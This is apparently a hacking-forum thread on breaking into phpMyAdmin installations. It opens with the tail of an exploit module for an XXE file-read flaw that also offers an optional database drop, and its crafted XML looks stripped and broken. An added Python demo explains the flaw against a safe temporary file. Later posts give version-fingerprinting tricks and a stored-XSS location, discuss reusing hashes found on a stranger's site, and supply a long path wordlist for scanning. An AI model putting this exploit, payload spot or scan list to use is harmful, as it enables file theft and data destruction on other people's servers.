    craftedXML = "------WebKitFormBoundary3XPL01T\n"
    craftedXML << "\n"
    craftedXML << "]>\n"
    craftedXML << "\n"
    craftedXML << "&conteudo;\n"
    craftedXML << "\n"
    craftedXML << "\n\n"

    send_request_cgi({
      'uri'     => datastore['APP']+'/import.php',
      'method'  => 'POST',
      'version' => '1.1',
      'headers' => {
        'Content-Type' => 'multipart/form-data; boundary=----WebKitFormBoundary3XPL01T',
        'Cookie'       => cookie
      },
      'data' => craftedXML
    }, 25)
    readfile(cookie, tokenvalue)
    if datastore['DROP'] == "true"
      dropdatabase(cookie, tokenvalue)
    else
      print_status("Database was not dropped: "+datastore['DB'])
    end
  end
end
http://1337day.com/exploits/17376
P.S. Date: 12-01-2012
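Added example, not the module's own code: it shows the XXE primitive behind the module above (CVE-2011-4107) on a constructed phpMyAdmin-style import document. A parser that resolves external general entities, as the importer did, copies the referenced file into the parsed row data; the same document parsed with external entities disabled yields an empty row. The target file is a temporary file with made-up content, and the element names are illustrative, not the importer's exact schema.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax import handler


class TextCollector(handler.ContentHandler):
    """Collects the character data of every <row> element (constructed element name)."""
    def __init__(self):
        super().__init__()
        self.rows = []
        self._buf = None

    def startElement(self, name, attrs):
        if name == "row":
            self._buf = []

    def characters(self, content):
        if self._buf is not None:
            self._buf.append(content)

    def endElement(self, name):
        if name == "row":
            self.rows.append("".join(self._buf))
            self._buf = None


def crafted_import(file_path):
    """Constructed import document: declares an external entity for file_path and
    expands it inside a table row, like the module's '&conteudo;' reference."""
    return (
        '<?xml version="1.0" encoding="utf-8"?>\n'
        '<!DOCTYPE pma [ <!ENTITY conteudo SYSTEM "%s"> ]>\n'
        '<pma><database name="hddaccess"><table name="files">'
        '<row>&conteudo;</row>'
        '</table></database></pma>\n' % file_path
    )


def parse_import(xml_text, resolve_external_entities):
    """Returns the row contents. True models the vulnerable importer (external
    general entities fetched and inlined); False is the hardened setting."""
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, resolve_external_entities)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_text.encode("utf-8")))
    return collector.rows


def demo():
    """Writes a fake passwd file, then parses the crafted import both ways."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")   # constructed file content
        path = f.name
    try:
        doc = crafted_import(path)
        return parse_import(doc, True), parse_import(doc, False)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    leaked, blocked = demo()
    print("vulnerable parser:", leaked)
    print("hardened parser:  ", blocked)
```

The module's `readfile` step then simply exports the table: once the entity has been inlined into the row, the file is ordinary row data. The fix is on the parser side (refuse to load external entities), not in the export code.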
Strikerus
15.04.2012, 16:13
calendar.php?GLOBALS
lets you find out the exact version, if > 3.*
Manuals are often left in place, which is a mistake. You can also determine the version that way:
.../phpmyadmin/Documentation.html
dynda2000
29.05.2012, 22:54
[QUOTE]phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection[/QUOTE]
Please explain how and with what to run this exploit?
Guys, tell me what can be done with this
go all materials
On one of the sites the admin apparently left a link like this by accident. What is in these hashes?
Nothing significant, it seems; two MD5 hashes (if I'm not mistaken).
Well, I don't get why there are two of them. Maybe one of them is the phpMyAdmin password? I know the login address and that user's login. It would be nice to crack the hashes, but first to know whether there is a password in them at all?
Or somehow authenticate using these hashes or the cookies.
MrCepbIu
13.09.2012, 20:53
[QUOTE="абвгдешка"]phpMyAdmin[/QUOTE]
Are there any other ways to find out the full path in phpMyAdmin? All the methods given in the first post are very old and no longer relevant ( At least when you have full user privileges?
ReVOLVeR
26.12.2012, 02:44
phpmyadmin stored XSS
tested on: phpMyAdmin 3.4.*
script: /setup/index.php
path: index.php?page=servers&mode=edit&id=1
vulnerable field: Server hostname
http://i54.fastpic.ru/thumb/2012/1226/10/e07a913574528e3e0a22c05f039b4310.jpeg (http://fastpic.ru/view/54/2012/1226/e07a913574528e3e0a22c05f039b4310.png.html)
Just found it, haven't checked whether it is already out on the internet.
Recently put together a wordlist for searching. Might come in handy for someone.
/_phpMyAdmin/
/admin/
/admin/mysql/
/admin/phpmyadmin/
/admin/pma/
/db/
/dbadmin/
/myadmin/
/mysql-admin/
/mysql/
/mysqladmin/
/mysqlmanager/
/p/m/a/
/php-my-admin/
/php-myadmin/
/phpm/
/phpmanager/
/phpmy-admin/
/phpmy/
/phpMyA/
/phpmyad-sys/
/phpmyad/
/phpMyAdmin/
/phpMyAdmin-1.1.0/
/phpMyAdmin-1.3.0/
/phpMyAdmin-2.0.5/
/phpMyAdmin-2.1.0/
/phpMyAdmin-2.10.0-rc1/
/phpMyAdmin-2.10.0.1/
/phpMyAdmin-2.10.0.2/
/phpMyAdmin-2.10.0/
/phpMyAdmin-2.10.1-rc1/
/phpMyAdmin-2.10.1/
/phpMyAdmin-2.10.2/
/phpMyAdmin-2.10.3-rc1/
/phpMyAdmin-2.10.3/
/phpMyAdmin-2.11.0-rc2/
/phpMyAdmin-2.11.0/
/phpMyAdmin-2.11.1-rc1/
/phpMyAdmin-2.11.1.1/
/phpMyAdmin-2.11.1.2/
/phpMyAdmin-2.11.1/
/phpMyAdmin-2.11.10.1/
/phpMyAdmin-2.11.10/
/phpMyAdmin-2.11.11-rc1/
/phpMyAdmin-2.11.11.1/
/phpMyAdmin-2.11.11.2/
/phpMyAdmin-2.11.11.3/
/phpMyAdmin-2.11.11/
/phpMyAdmin-2.11.2-rc1/
/phpMyAdmin-2.11.2.1/
/phpMyAdmin-2.11.2.2/
/phpMyAdmin-2.11.2/
/phpMyAdmin-2.11.3-rc1/
/phpMyAdmin-2.11.3/
/phpMyAdmin-2.11.4-rc1/
/phpMyAdmin-2.11.4/
/phpMyAdmin-2.11.5-rc1/
/phpMyAdmin-2.11.5.1/
/phpMyAdmin-2.11.5.2/
/phpMyAdmin-2.11.5/
/phpMyAdmin-2.11.6-rc1/
/phpMyAdmin-2.11.6/
/phpMyAdmin-2.11.7-rc1/
/phpMyAdmin-2.11.7-rc2/
/phpMyAdmin-2.11.7.1/
/phpMyAdmin-2.11.7/
/phpMyAdmin-2.11.8-rc1/
/phpMyAdmin-2.11.8.1/
/phpMyAdmin-2.11.8/
/phpMyAdmin-2.11.9.1/
/phpMyAdmin-2.11.9.2/
/phpMyAdmin-2.11.9.3/
/phpMyAdmin-2.11.9.4/
/phpMyAdmin-2.11.9.5/
/phpMyAdmin-2.11.9.6/
/phpMyAdmin-2.11.9/
/phpMyAdmin-2.2.0/
/phpMyAdmin-2.2.1/
/phpMyAdmin-2.2.2/
/phpMyAdmin-2.2.3/
/phpMyAdmin-2.2.4/
/phpMyAdmin-2.2.5/
/phpMyAdmin-2.2.6/
/phpMyAdmin-2.2.7-pl1/
/phpMyAdmin-2.3.0/
/phpMyAdmin-2.3.1/
/phpMyAdmin-2.3.2/
/phpMyAdmin-2.3.3-pl1/
/phpMyAdmin-2.4.0/
/phpMyAdmin-2.5.0/
/phpMyAdmin-2.5.1/
/phpMyAdmin-2.5.2/
/phpMyAdmin-2.5.4/
/phpMyAdmin-2.5.5-pl1/
/phpMyAdmin-2.5.5-rc1/
/phpMyAdmin-2.5.5-rc2/
/phpMyAdmin-2.5.6-rc1/
/phpMyAdmin-2.5.6-rc2/
/phpMyAdmin-2.5.6/
/phpMyAdmin-2.5.7-pl1/
/phpMyAdmin-2.6.0-alpha/
/phpMyAdmin-2.6.0-alpha2/
/phpMyAdmin-2.6.0-beta1/
/phpMyAdmin-2.6.0-beta2/
/phpMyAdmin-2.6.0-pl1/
/phpMyAdmin-2.6.0-pl2/
/phpMyAdmin-2.6.0-pl3/
/phpMyAdmin-2.6.0-rc1/
/phpMyAdmin-2.6.0-rc2/
/phpMyAdmin-2.6.0-rc3/
/phpMyAdmin-2.6.0/
/phpMyAdmin-2.6.1-pl1/
/phpMyAdmin-2.6.1-pl2/
/phpMyAdmin-2.6.1-pl3/
/phpMyAdmin-2.6.1-rc1/
/phpMyAdmin-2.6.1-rc2/
/phpMyAdmin-2.6.1/
/phpMyAdmin-2.6.2-beta1/
/phpMyAdmin-2.6.2-pl1/
/phpMyAdmin-2.6.2-rc1/
/phpMyAdmin-2.6.3-pl1/
/phpMyAdmin-2.6.3-rc1/
/phpMyAdmin-2.6.3/
/phpMyAdmin-2.6.4-pl1/
/phpMyAdmin-2.6.4-pl2/
/phpMyAdmin-2.6.4-pl3/
/phpMyAdmin-2.6.4-pl4/
/phpMyAdmin-2.6.4-rc1/
/phpMyAdmin-2.7.0-beta1/
/phpMyAdmin-2.7.0-pl1/
/phpMyAdmin-2.7.0-pl2/
/phpMyAdmin-2.7.0-rc1/
/phpMyAdmin-2.8.0-beta1/
/phpMyAdmin-2.8.0-rc1/
/phpMyAdmin-2.8.0-rc2/
/phpMyAdmin-2.8.0.1/
/phpMyAdmin-2.8.0.2/
/phpMyAdmin-2.8.0.3/
/phpMyAdmin-2.8.0.4/
/phpMyAdmin-2.8.0/
/phpMyAdmin-2.8.1-rc1/
/phpMyAdmin-2.8.1/
/phpMyAdmin-2.8.2.4/
/phpMyAdmin-2.9.0.1/
/phpMyAdmin-2.9.0.2/
/phpMyAdmin-2.9.0/
/phpMyAdmin-2.9.1.1/
/phpMyAdmin-2.9.2-rc1/
/phpMyAdmin-2.9.2/
/phpMyAdmin-2/
/phpMyAdmin-3.0.0-alpha/
/phpMyAdmin-3.0.0-rc2/
/phpMyAdmin-3.0.0/
/phpMyAdmin-3.0.1-rc1/
/phpMyAdmin-3.0.1.1/
/phpMyAdmin-3.0.1/
/phpMyAdmin-3.1.0-beta1/
/phpMyAdmin-3.1.0-rc1/
/phpMyAdmin-3.1.0/
/phpMyAdmin-3.1.1/
/phpMyAdmin-3.1.2-rc1/
/phpMyAdmin-3.1.2/
/phpMyAdmin-3.1.3-rc1/
/phpMyAdmin-3.1.3.1/
/phpMyAdmin-3.1.3.2/
/phpMyAdmin-3.1.3/
/phpMyAdmin-3.1.4-rc1/
/phpMyAdmin-3.1.4-rc2/
/phpMyAdmin-3.1.4/
/phpMyAdmin-3.1.5-rc1/
/phpMyAdmin-3.1.5/
/phpMyAdmin-3.2.0-beta1/
/phpMyAdmin-3.2.0-rc1/
/phpMyAdmin-3.2.0.1/
/phpMyAdmin-3.2.0/
/phpMyAdmin-3.2.1/
/phpMyAdmin-3.2.2-rc1/
/phpMyAdmin-3.2.2.1/
/phpMyAdmin-3.2.2/
/phpMyAdmin-3.2.3-rc1/
/phpMyAdmin-3.2.3/
/phpMyAdmin-3.2.4-rc1/
/phpMyAdmin-3.2.4/
/phpMyAdmin-3.2.5-rc1/
/phpMyAdmin-3.2.5-rc2/
/phpMyAdmin-3.2.5/
/phpMyAdmin-3.3.0-alpha1/
/phpMyAdmin-3.3.0-beta1/
/phpMyAdmin-3.3.0-rc1/
/phpMyAdmin-3.3.0-rc2/
/phpMyAdmin-3.3.0-rc3/
/phpMyAdmin-3.3.0/
/phpMyAdmin-3.3.1-rc1/
/phpMyAdmin-3.3.1/
/phpMyAdmin-3.3.10-rc1/
/phpMyAdmin-3.3.10.1/
/phpMyAdmin-3.3.10.2/
/phpMyAdmin-3.3.10.3/
/phpMyAdmin-3.3.10.4/
/phpMyAdmin-3.3.10.5/
/phpMyAdmin-3.3.10/
/phpMyAdmin-3.3.2-rc1/
/phpMyAdmin-3.3.2/
/phpMyAdmin-3.3.3-rc1/
/phpMyAdmin-3.3.3/
/phpMyAdmin-3.3.4-rc1/
/phpMyAdmin-3.3.4/
/phpMyAdmin-3.3.5-rc1/
/phpMyAdmin-3.3.5.1/
/phpMyAdmin-3.3.5/
/phpMyAdmin-3.3.6-rc1/
/phpMyAdmin-3.3.6/
/phpMyAdmin-3.3.7-7/
/phpMyAdmin-3.3.7-rc1/
/phpMyAdmin-3.3.7/
/phpMyAdmin-3.3.8-rc1/
/phpMyAdmin-3.3.8.1/
/phpMyAdmin-3.3.8/
/phpMyAdmin-3.3.9-rc1/
/phpMyAdmin-3.3.9.1/
/phpMyAdmin-3.3.9.2/
/phpMyAdmin-3.3.9/
/phpMyAdmin-3.4.0-alpha1/
/phpMyAdmin-3.4.0-alpha2/
/phpMyAdmin-3.4.0-beta1/
/phpMyAdmin-3.4.0-beta2/
/phpMyAdmin-3.4.0-beta3/
/phpMyAdmin-3.4.0-beta4/
/phpMyAdmin-3.4.0-rc1/
/phpMyAdmin-3.4.0-rc2/
/phpMyAdmin-3.4.0/
/phpMyAdmin-3.4.1-rc1/
/phpMyAdmin-3.4.1/
/phpMyAdmin-3.4.10-rc1/
/phpMyAdmin-3.4.10.1/
/phpMyAdmin-3.4.10.2/
/phpMyAdmin-3.4.10/
/phpMyAdmin-3.4.11-rc1/
/phpMyAdmin-3.4.11.1/
/phpMyAdmin-3.4.11/
/phpMyAdmin-3.4.2-rc1/
/phpMyAdmin-3.4.2/
/phpMyAdmin-3.4.3-rc1/
/phpMyAdmin-3.4.3.1/
/phpMyAdmin-3.4.3.2/
/phpMyAdmin-3.4.3/
/phpMyAdmin-3.4.4-rc1/
/phpMyAdmin-3.4.4/
/phpMyAdmin-3.4.5-rc1/
/phpMyAdmin-3.4.5/
/phpMyAdmin-3.4.6-rc1/
/phpMyAdmin-3.4.6/
/phpMyAdmin-3.4.7-rc1/
/phpMyAdmin-3.4.7.1/
/phpMyAdmin-3.4.7/
/phpMyAdmin-3.4.8-rc1/
/phpMyAdmin-3.4.8/
/phpMyAdmin-3.4.9-rc1/
/phpMyAdmin-3.4.9/
/phpMyAdmin-3.5.0-alpha1/
/phpMyAdmin-3.5.0-beta1/
/phpMyAdmin-3.5.0-rc1/
/phpMyAdmin-3.5.0-rc2/
/phpMyAdmin-3.5.0/
/phpMyAdmin-3.5.1-rc1/
/phpMyAdmin-3.5.1/
/phpMyAdmin-3.5.2-rc1/
/phpMyAdmin-3.5.2.1/
/phpMyAdmin-3.5.2.2/
/phpMyAdmin-3.5.2/
/phpMyAdmin-3.5.3-rc1/
/phpMyAdmin-3.5.3/
/phpMyAdmin-3.5.4-rc1/
/phpMyAdmin-3.5.4/
/phpMyAdmin-3.5.5-rc1/
/phpMyAdmin-3.5.5/
/phpMyAdmin-3.5.6-rc1/
/phpMyAdmin-3.5.6/
/phpMyAdmin-3.5.7-rc1/
/phpMyAdmin-3.5.7/
/phpMyAdmin-3.5.8-rc1/
/phpMyAdmin-3.5.8.1/
/phpMyAdmin-3.5.8.2/
/phpMyAdmin-3.5.8/
/phpMyAdmin-3/
/phpMyAdmin-4.0.0-alpha1/
/phpMyAdmin-4.0.0-alpha2/
/phpMyAdmin-4.0.0-beta1/
/phpMyAdmin-4.0.0-beta2/
/phpMyAdmin-4.0.0-rc2/
/phpMyAdmin-4.0.0-rc3/
/phpMyAdmin-4.0.0-rc4/
/phpMyAdmin-4.0.0/
/phpMyAdmin-4.0.1-rc1/
/phpMyAdmin-4.0.1/
/phpMyAdmin-4.0.10.1/
/phpMyAdmin-4.0.10.2/
/phpMyAdmin-4.0.10.3/
/phpMyAdmin-4.0.10.4/
/phpMyAdmin-4.0.10.5/
/phpMyAdmin-4.0.10.6/
/phpMyAdmin-4.0.10.7/
/phpMyAdmin-4.0.10.8/
/phpMyAdmin-4.0.10.9/
/phpMyAdmin-4.0.10/
/phpMyAdmin-4.0.2-rc1/
/phpMyAdmin-4.0.2/
/phpMyAdmin-4.0.3-rc1/
/phpMyAdmin-4.0.3/
/phpMyAdmin-4.0.4-rc1/
/phpMyAdmin-4.0.4.1/
/phpMyAdmin-4.0.4.2/
/phpMyAdmin-4.0.4/
/phpMyAdmin-4.0.5/
/phpMyAdmin-4.0.6/
/phpMyAdmin-4.0.7/
/phpMyAdmin-4.0.8/
/phpMyAdmin-4.0.9/
/phpMyAdmin-4.1.0/
/phpMyAdmin-4.1.1/
/phpMyAdmin-4.1.10/
/phpMyAdmin-4.1.11/
/phpMyAdmin-4.1.12/
/phpMyAdmin-4.1.13/
/phpMyAdmin-4.1.14.1/
/phpMyAdmin-4.1.14.2/
/phpMyAdmin-4.1.14.3/
/phpMyAdmin-4.1.14.4/
/phpMyAdmin-4.1.14.5/
/phpMyAdmin-4.1.14.6/
/phpMyAdmin-4.1.14.7/
/phpMyAdmin-4.1.14.8/
/phpMyAdmin-4.1.14/
/phpMyAdmin-4.1.2/
/phpMyAdmin-4.1.3/
/phpMyAdmin-4.1.4/
/phpMyAdmin-4.1.5/
/phpMyAdmin-4.1.6/
/phpMyAdmin-4.1.7/
/phpMyAdmin-4.1.8/
/phpMyAdmin-4.1.9/
/phpMyAdmin-4.2.0/
/phpMyAdmin-4.2.1/
/phpMyAdmin-4.2.10.1/
/phpMyAdmin-4.2.10/
/phpMyAdmin-4.2.11/
/phpMyAdmin-4.2.12/
/phpMyAdmin-4.2.13.1/
/phpMyAdmin-4.2.13.2/
/phpMyAdmin-4.2.13/
/phpMyAdmin-4.2.2/
/phpMyAdmin-4.2.3/
/phpMyAdmin-4.2.4/
/phpMyAdmin-4.2.5/
/phpMyAdmin-4.2.6/
/phpMyAdmin-4.2.7.1/
/phpMyAdmin-4.2.7/
/phpMyAdmin-4.2.8.1/
/phpMyAdmin-4.2.8/
/phpMyAdmin-4.2.9.1/
/phpMyAdmin-4.2.9/
/phpMyAdmin-4.3.0-alpha1/
/phpMyAdmin-4.3.0-beta1/
/phpMyAdmin-4.3.0-rc1/
/phpMyAdmin-4.3.0-rc2/
/phpMyAdmin-4.3.0/
/phpMyAdmin-4.3.1/
/phpMyAdmin-4.3.10/
/phpMyAdmin-4.3.11.1/
/phpMyAdmin-4.3.11/
/phpMyAdmin-4.3.12/
/phpMyAdmin-4.3.13/
/phpMyAdmin-4.3.2/
/phpMyAdmin-4.3.3/
/phpMyAdmin-4.3.4/
/phpMyAdmin-4.3.5/
/phpMyAdmin-4.3.6/
/phpMyAdmin-4.3.7/
/phpMyAdmin-4.3.8/
/phpMyAdmin-4.3.9/
/phpMyAdmin-4.4.0-alpha1/
/phpMyAdmin-4.4.0-rc1/
/phpMyAdmin-4/
/phpmyadmin-RELEASE_2_10_0/
/phpmyadmin-RELEASE_2_10_0_1/
/phpmyadmin-RELEASE_2_10_0_2/
/phpmyadmin-RELEASE_2_10_0RC1/
/phpmyadmin-RELEASE_2_10_1RC1/
/phpmyadmin-RELEASE_2_10_2/
/phpmyadmin-RELEASE_2_10_3/
/phpmyadmin-RELEASE_2_10_3RC1/
/phpmyadmin-RELEASE_2_11_0/
/phpmyadmin-RELEASE_2_11_0RC2/
/phpmyadmin-RELEASE_2_11_1/
/phpmyadmin-RELEASE_2_11_1_1/
/phpmyadmin-RELEASE_2_11_1_2/
/phpmyadmin-RELEASE_2_11_10/
/phpmyadmin-RELEASE_2_11_10_1/
/phpmyadmin-RELEASE_2_11_11/
/phpmyadmin-RELEASE_2_11_11_1/
/phpmyadmin-RELEASE_2_11_11_2/
/phpmyadmin-RELEASE_2_11_11_3/
/phpmyadmin-RELEASE_2_11_11RC1/
/phpmyadmin-RELEASE_2_11_1RC1/
/phpmyadmin-RELEASE_2_11_2/
/phpmyadmin-RELEASE_2_11_2_1/
/phpmyadmin-RELEASE_2_11_2_2/
/phpmyadmin-RELEASE_2_11_2RC1/
/phpmyadmin-RELEASE_2_11_3/
/phpmyadmin-RELEASE_2_11_3RC1/
/phpmyadmin-RELEASE_2_11_4/
/phpmyadmin-RELEASE_2_11_4RC1/
/phpmyadmin-RELEASE_2_11_5/
/phpmyadmin-RELEASE_2_11_5_1/
/phpmyadmin-RELEASE_2_11_5_2/
/phpmyadmin-RELEASE_2_11_5RC1/
/phpmyadmin-RELEASE_2_11_6/
/phpmyadmin-RELEASE_2_11_6RC1/
/phpmyadmin-RELEASE_2_11_7/
/phpmyadmin-RELEASE_2_11_7_1/
/phpmyadmin-RELEASE_2_11_7RC1/
/phpmyadmin-RELEASE_2_11_7RC2/
/phpmyadmin-RELEASE_2_11_8/
/phpmyadmin-RELEASE_2_11_8_1/
/phpmyadmin-RELEASE_2_11_8RC1/
/phpmyadmin-RELEASE_2_11_9/
/phpmyadmin-RELEASE_2_11_9_1/
/phpmyadmin-RELEASE_2_11_9_2/
/phpmyadmin-RELEASE_2_11_9_3/
/phpmyadmin-RELEASE_2_11_9_4/
/phpmyadmin-RELEASE_2_11_9_5/
/phpmyadmin-RELEASE_2_11_9_6/
/phpmyadmin-RELEASE_2_2_0/
/phpmyadmin-RELEASE_2_2_1/
/phpmyadmin-RELEASE_2_2_2/
/phpmyadmin-RELEASE_2_2_3/
/phpmyadmin-RELEASE_2_2_4/
/phpmyadmin-RELEASE_2_2_5/
/phpmyadmin-RELEASE_2_2_6/
/phpmyadmin-RELEASE_2_2_7PL1/
/phpmyadmin-RELEASE_2_3_0/
/phpmyadmin-RELEASE_2_3_1/
/phpmyadmin-RELEASE_2_3_2/
/phpmyadmin-RELEASE_2_3_3PL1/
/phpmyadmin-RELEASE_2_4_0/
/phpmyadmin-RELEASE_2_5_0/
/phpmyadmin-RELEASE_2_5_1/
/phpmyadmin-RELEASE_2_5_2/
/phpmyadmin-RELEASE_2_5_4/
/phpmyadmin-RELEASE_2_5_5PL1/
/phpmyadmin-RELEASE_2_5_6/
/phpmyadmin-RELEASE_2_6_1PL3/
/phpmyadmin-RELEASE_2_7_0PL2/
/phpmyadmin-RELEASE_2_8_0_4/
/phpmyadmin-RELEASE_2_8_1/
/phpmyadmin-RELEASE_2_8_2_4/
/phpmyadmin-RELEASE_2_9_0/
/phpmyadmin-RELEASE_2_9_0_1/
/phpmyadmin-RELEASE_2_9_0_2/
/phpmyadmin-RELEASE_2_9_1_1/
/phpmyadmin-RELEASE_2_9_2/
/phpmyadmin-RELEASE_2_9_2RC1/
/phpmyadmin-RELEASE_3_0_0/
/phpmyadmin-RELEASE_3_0_0ALPHA/
/phpmyadmin-RELEASE_3_0_0RC2/
/phpmyadmin-RELEASE_3_0_1/
/phpmyadmin-RELEASE_3_0_1_1/
/phpmyadmin-RELEASE_3_0_1RC1/
/phpmyadmin-RELEASE_3_1_0/
/phpmyadmin-RELEASE_3_1_0BETA1/
/phpmyadmin-RELEASE_3_1_0RC1/
/phpmyadmin-RELEASE_3_1_1/
/phpmyadmin-RELEASE_3_1_2/
/phpmyadmin-RELEASE_3_1_2RC1/
/phpmyadmin-RELEASE_3_1_3/
/phpmyadmin-RELEASE_3_1_3_1/
/phpmyadmin-RELEASE_3_1_3_2/
/phpmyadmin-RELEASE_3_1_3RC1/
/phpmyadmin-RELEASE_3_1_4/
/phpmyadmin-RELEASE_3_1_4RC1/
/phpmyadmin-RELEASE_3_1_4RC2/
/phpmyadmin-RELEASE_3_1_5/
/phpmyadmin-RELEASE_3_1_5RC1/
/phpmyadmin-RELEASE_3_2_0/
/phpmyadmin-RELEASE_3_2_0_1/
/phpmyadmin-RELEASE_3_2_0BETA1/
/phpmyadmin-RELEASE_3_2_0RC1/
/phpmyadmin-RELEASE_3_2_2/
/phpmyadmin-RELEASE_3_2_2_1/
/phpmyadmin-RELEASE_3_2_2RC1/
/phpmyadmin-RELEASE_3_2_3/
/phpmyadmin-RELEASE_3_2_3RC1/
/phpmyadmin-RELEASE_3_2_4/
/phpmyadmin-RELEASE_3_2_4RC1/
/phpmyadmin-RELEASE_3_2_5/
/phpmyadmin-RELEASE_3_2_5RC1/
/phpmyadmin-RELEASE_3_2_5RC2/
/phpmyadmin-RELEASE_3_3_0/
/phpmyadmin-RELEASE_3_3_0ALPHA1/
/phpmyadmin-RELEASE_3_3_0BETA1/
/phpmyadmin-RELEASE_3_3_0RC1/
/phpmyadmin-RELEASE_3_3_0RC2/
/phpmyadmin-RELEASE_3_3_0RC3/
/phpmyadmin-RELEASE_3_3_1/
/phpmyadmin-RELEASE_3_3_10/
/phpmyadmin-RELEASE_3_3_10_1/
/phpmyadmin-RELEASE_3_3_10_2/
/phpmyadmin-RELEASE_3_3_10_3/
/phpmyadmin-RELEASE_3_3_10_4/
/phpmyadmin-RELEASE_3_3_10_5/
/phpmyadmin-RELEASE_3_3_10RC1/
/phpmyadmin-RELEASE_3_3_1RC1/
/phpmyadmin-RELEASE_3_3_2/
/phpmyadmin-RELEASE_3_3_2RC1/
/phpmyadmin-RELEASE_3_3_3/
/phpmyadmin-RELEASE_3_3_3RC1/
/phpmyadmin-RELEASE_3_3_4/
/phpmyadmin-RELEASE_3_3_4RC1/
/phpmyadmin-RELEASE_3_3_5/
/phpmyadmin-RELEASE_3_3_5_1/
/phpmyadmin-RELEASE_3_3_5RC1/
/phpmyadmin-RELEASE_3_3_6/
/phpmyadmin-RELEASE_3_3_6RC1/
/phpmyadmin-RELEASE_3_3_7/
/phpmyadmin-RELEASE_3_3_7RC1/
/phpmyadmin-RELEASE_3_3_8/
/phpmyadmin-RELEASE_3_3_8_1/
/phpmyadmin-RELEASE_3_3_8RC1/
/phpmyadmin-RELEASE_3_3_9/
/phpmyadmin-RELEASE_3_3_9_1/
/phpmyadmin-RELEASE_3_3_9_2/
/phpmyadmin-RELEASE_3_3_9RC1/
/phpmyadmin-RELEASE_3_4_0/
/phpmyadmin-RELEASE_3_4_0ALPHA1/
/phpmyadmin-RELEASE_3_4_0ALPHA2/
/phpmyadmin-RELEASE_3_4_0BETA1/
/phpmyadmin-RELEASE_3_4_0BETA2/
/phpmyadmin-RELEASE_3_4_0BETA3/
/phpmyadmin-RELEASE_3_4_0BETA4/
/phpmyadmin-RELEASE_3_4_0RC1/
/phpmyadmin-RELEASE_3_4_0RC2/
/phpmyadmin-RELEASE_3_4_1/
/phpmyadmin-RELEASE_3_4_10/
/phpmyadmin-RELEASE_3_4_10_1/
/phpmyadmin-RELEASE_3_4_10_2/
/phpmyadmin-RELEASE_3_4_10RC1/
/phpmyadmin-RELEASE_3_4_11/
/phpmyadmin-RELEASE_3_4_11_1/
/phpmyadmin-RELEASE_3_4_11RC1/
/phpmyadmin-RELEASE_3_4_1RC1/
/phpmyadmin-RELEASE_3_4_2/
/phpmyadmin-RELEASE_3_4_2RC1/
/phpmyadmin-RELEASE_3_4_3/
/phpmyadmin-RELEASE_3_4_3_1/
/phpmyadmin-RELEASE_3_4_3_2/
/phpmyadmin-RELEASE_3_4_3RC1/
/phpmyadmin-RELEASE_3_4_4/
/phpmyadmin-RELEASE_3_4_4RC1/
/phpmyadmin-RELEASE_3_4_5/
/phpmyadmin-RELEASE_3_4_5RC1/
/phpmyadmin-RELEASE_3_4_6/
/phpmyadmin-RELEASE_3_4_6RC1/
/phpmyadmin-RELEASE_3_4_7/
/phpmyadmin-RELEASE_3_4_7_1/
/phpmyadmin-RELEASE_3_4_7RC1/
/phpmyadmin-RELEASE_3_4_8/
/phpmyadmin-RELEASE_3_4_8RC1/
/phpmyadmin-RELEASE_3_4_9/
/phpmyadmin-RELEASE_3_4_9RC1/
/phpmyadmin-RELEASE_3_5_0/
/phpmyadmin-RELEASE_3_5_0ALPHA1/
/phpmyadmin-RELEASE_3_5_0BETA1/
/phpmyadmin-RELEASE_3_5_0RC1/
/phpmyadmin-RELEASE_3_5_0RC2/
/phpmyadmin-RELEASE_3_5_1/
/phpmyadmin-RELEASE_3_5_1RC1/
/phpmyadmin-RELEASE_3_5_2/
/phpmyadmin-RELEASE_3_5_2_1/
/phpmyadmin-RELEASE_3_5_2_2/
/phpmyadmin-RELEASE_3_5_2RC1/
/phpmyadmin-RELEASE_3_5_3/
/phpmyadmin-RELEASE_3_5_3RC1/
/phpmyadmin-RELEASE_3_5_4/
/phpmyadmin-RELEASE_3_5_4RC1/
/phpmyadmin-RELEASE_3_5_5/
/phpmyadmin-RELEASE_3_5_5RC1/
/phpmyadmin-RELEASE_3_5_6/
/phpmyadmin-RELEASE_3_5_6RC1/
/phpmyadmin-RELEASE_3_5_7/
/phpmyadmin-RELEASE_3_5_7RC1/
/phpmyadmin-RELEASE_3_5_8/
/phpmyadmin-RELEASE_3_5_8_1/
/phpmyadmin-RELEASE_3_5_8RC1/
/phpmyadmin-RELEASE_4_0_0/
/phpmyadmin-RELEASE_4_0_0ALPHA1/
/phpmyadmin-RELEASE_4_0_0ALPHA2/
/phpmyadmin-RELEASE_4_0_0BETA1/
/phpmyadmin-RELEASE_4_0_0BETA2/
/phpmyadmin-RELEASE_4_0_0RC2/
/phpmyadmin-RELEASE_4_0_0RC3/
/phpmyadmin-RELEASE_4_0_0RC4/
/phpmyadmin-RELEASE_4_0_1/
/phpmyadmin-RELEASE_4_0_10_1/
/phpmyadmin-RELEASE_4_0_10_2/
/phpmyadmin-RELEASE_4_0_10_3/
/phpmyadmin-RELEASE_4_0_10_4/
/phpmyadmin-RELEASE_4_0_10_5/
/phpmyadmin-RELEASE_4_0_10_6/
/phpmyadmin-RELEASE_4_0_10_7/
/phpmyadmin-RELEASE_4_0_10_8/
/phpmyadmin-RELEASE_4_0_10_9/
/phpmyadmin-RELEASE_4_0_1RC1/
/phpmyadmin-RELEASE_4_0_2/
/phpmyadmin-RELEASE_4_0_2RC1/
/phpmyadmin-RELEASE_4_0_3/
/phpmyadmin-RELEASE_4_0_3RC1/
/phpmyadmin-RELEASE_4_0_4RC1/
/phpmyadmin-RELEASE_4_1_14_2/
/phpmyadmin-RELEASE_4_1_14_3/
/phpmyadmin-RELEASE_4_1_14_4/
/phpmyadmin-RELEASE_4_1_14_5/
/phpmyadmin-RELEASE_4_1_14_6/
/phpmyadmin-RELEASE_4_1_14_7/
/phpmyadmin-RELEASE_4_1_14_8/
/phpmyadmin-RELEASE_4_2_10/
/phpmyadmin-RELEASE_4_2_10_1/
/phpmyadmin-RELEASE_4_2_11/
/phpmyadmin-RELEASE_4_2_12/
/phpmyadmin-RELEASE_4_2_13/
